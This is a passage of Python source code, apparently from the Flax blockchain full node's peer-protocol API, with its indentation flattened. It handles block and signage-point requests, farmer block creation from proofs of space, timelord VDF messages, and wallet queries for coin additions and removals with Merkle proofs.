for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
# Serialization of wp is slow
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash = self.full_node.blockchain.height_to_hash(request.height)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
@api_request
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(
self.full_node.blockchain.height_to_hash(uint32(i))
)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(
self.full_node.blockchain.height_to_hash(uint32(i))
)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
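# Manually assemble the RespondBlocks payload: uint32 start_height, uint32
# end_height, a 4-byte big-endian block count, then the raw block bytes,
# avoiding a deserialize/reserialize round trip for each block.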
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSFlaxConnection,
) -> Optional[Message]:
"""
Receive a full block from a peer full node (or ourselves).
"""
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_info()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
# This prevents us from downloading the same block from many peers
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
# However, we want to eventually download from other peers, if this peer does not respond
# Todo: keep track of who it was
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSFlaxConnection,
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(respond_unfinished_block, peer)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSFlaxConnection
) -> Optional[Message]:
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
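# Walk backwards through up to 30 end-of-sub-slot bundles, requesting each
# missing one from the peer, until we reach a sub-slot we already have (or the
# genesis challenge); give up if more than 3 non-empty sub-slots are seen,
# since that suggests we have diverged from this peer.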
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
# We want to catch up to the latest slot so we can receive signage points
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
# If this is a normal signage point and we don't have the end of sub slot, request the end of sub slot
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSFlaxConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSFlaxConnection
) -> Optional[Message]:
"""
Creates a block body and header, with the proof of space, coinbase, and fee targets provided
by the farmer, and sends the hash of the header data back to the farmer.
"""
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node.blockchain.lock:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
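# required_iters is derived from the proof-of-space quality and the current
# difficulty; sp_iters and ip_iters then convert the signage point index and
# required_iters into iteration offsets within the current sub_slot_iters.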
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes([0] * 32)
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSFlaxConnection
) -> Optional[Message]:
"""
Signature of header hash, by the harvester. This is enough to create an unfinished
block, which only needs a Proof of Time to be finished. If the signature is valid,
we call the unfinished_block routine.
"""
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSFlaxConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSFlaxConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
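# For every requested puzzle hash we return an inclusion proof for the puzzle
# hash itself and, when coins exist for it, a second proof for the hash of its
# coin list; puzzle hashes with no coins get a non-inclusion proof and an
# empty coin list.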
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or block.height > self.full_node.blockchain.get_peak_height()
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction) -> Optional[Message]:
spend_name = request.transaction.name()
